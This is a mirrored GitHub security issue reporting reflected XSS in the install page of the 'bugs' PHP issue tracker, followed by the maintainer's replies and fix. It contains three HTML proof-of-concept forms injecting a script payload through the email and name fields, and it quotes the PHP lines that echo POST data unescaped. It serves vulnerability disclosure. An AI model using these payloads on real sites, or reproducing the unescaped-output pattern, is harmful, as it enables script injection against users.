Giters

pixeline / bugs

Simple Issue Tracking for Teams. Built in Laravel 3 (php/mysql)

Home Page:pixeline.github.io/bugs/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[Security] multiple XSS in install/index.php of bugs and tinyissue

seongil-wi opened this issue · comments

commented

Describe the bug
Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.

To Reproduce
Steps to reproduce the behavior:

  1. Go to the installation page
  2. Complete the configuration including DB connection
  3. Access each page of these HTML files.

Exploit 1 - exploit email parameter

<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name="email" value='test"/><script>alert(1)</script>'>
  <button>Send my greetings</button>
</form>
</html>

Exploit 2 - exploit first_name parameter

<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name='first_name' value='test"/><script>alert(1)</script>'>
   <input name='email' value='hi'>
  <button>Send my greetings</button>
</form>
</html>

Exploit 3 - exploit last_name parameter

<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name='last_name' value='test"/><script>alert(1)</script>'>
   <input name='email' value='hi'>
  <button>Send my greetings</button>
</form>
</html>
  1. Boom!

Screenshots

  • Attack result
    캡처

Where the Issue Occurred
The code below displays the user-controlled parameter first_name, last_name, and email without sufficient sanitization:

bugs/install/index.php

Line 94 in f38ddb4

<input autocomplete="off" type="text" name="first_name" id="first_name" value="<?php echo $_POST['first_name']; ?>"/>

bugs/install/index.php

Line 101 in f38ddb4

<input autocomplete="off" type="text" name="last_name" id="last_name" value="<?php echo $_POST['last_name']; ?>"/>

bugs/install/index.php

Line 120 in f38ddb4

<input autocomplete="off" type="text" name="email" id="email" value="<?php echo $_POST['email']; ?>"/>

Note

Note that these multiple XSS vulnerabilities exist in the tinyissue as well as in the bugs repository here.

commented

Thanks for that.
You trick works only if BUGS is not installed.
When installed, BUGS/install/index.php returns the following:

image

commented

Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.

commented

Thanks again.

BUGS users are mostly local users, as you prompt in your example: http://localhost/... they manage their own security.
Anyway, I'll reinforce security processes according to your advice.

commented

Install process updated.
Thanks